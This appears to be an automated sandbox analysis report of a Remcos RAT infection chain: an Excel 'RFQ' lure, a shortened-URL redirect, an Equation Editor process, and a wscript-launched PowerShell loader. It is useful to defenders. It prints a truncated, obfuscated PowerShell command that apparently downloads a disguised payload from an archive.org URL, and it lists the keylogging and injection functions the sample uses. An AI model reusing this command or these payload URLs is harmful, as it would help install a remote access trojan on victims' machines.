                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: powershell.exe, 0000000D.00000002.511591510.0000000002399000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org
                Source: powershell.exe, 0000000D.00000002.510198606.0000000000330000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.514548076.0000000005114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
                Source: powershell.exe, 0000000B.00000002.516053834.0000000002603000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240LR
                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: powershell.exe, 0000000D.00000002.512511300.0000000003289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                Source: RegAsm.exe, 0000000F.00000002.522516063.0000000002C80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.522490434.0000000002A8E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.522503026.0000000002B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                Source: zhort.de.url.4.drString found in binary or memory: https://zhort.de/
                Source: RFQ No. 109078906v.xla.xlsx, FoNVg0.url.4.drString found in binary or memory: https://zhort.de/FoNVg0
                Source: ~DFAEDAA30879C445E4.TMP.0.dr, 9EC30000.0.drString found in binary or memory: https://zhort.de/FoNVg0yX
                Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49161 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49163 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to register a low level keyboard hook
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,0000000014_2_0040A2B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,14_2_0040B70E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,14_2_004168C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,15_2_0040987A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004098E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_00406DFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,17_2_00406E9F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,18_2_004068B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,18_2_004072B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,14_2_0040B70E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,14_2_0040A3E0

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.620697128.0000000000525000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.620697128.0000000000541000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2772, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTR

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3084, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 2772, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 2772, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFA95D3F.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Excel sheet contains many unusual embedded objects
                Source: RFQ No. 109078906v.xla.xlsxOLE: Microsoft Excel 2007+
                Source: 9EC30000.0.drOLE: Microsoft Excel 2007+
                Microsoft Office drops suspicious files
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\FoNVg0.urlJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\zhort.de.urlJump to behavior
                Very long command line found
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9438
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9438Jump to behavior
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                Wscript starts Powershell (via cmd or directly)
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,14_2_004180EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,14_2_004132D2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,14_2_0041BB09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,14_2_0041BB35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00401806 NtdllDefWindowProc_W,15_2_00401806
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004018C0 NtdllDefWindowProc_W,15_2_004018C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004016FD NtdllDefWindowProc_A,17_2_004016FD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004017B7 NtdllDefWindowProc_A,17_2_004017B7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00402CAC NtdllDefWindowProc_A,18_2_00402CAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00402D66 NtdllDefWindowProc_A,18_2_00402D66
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,14_2_004167B4
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0032CCEB9_2_0032CCEB
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_003227089_2_00322708
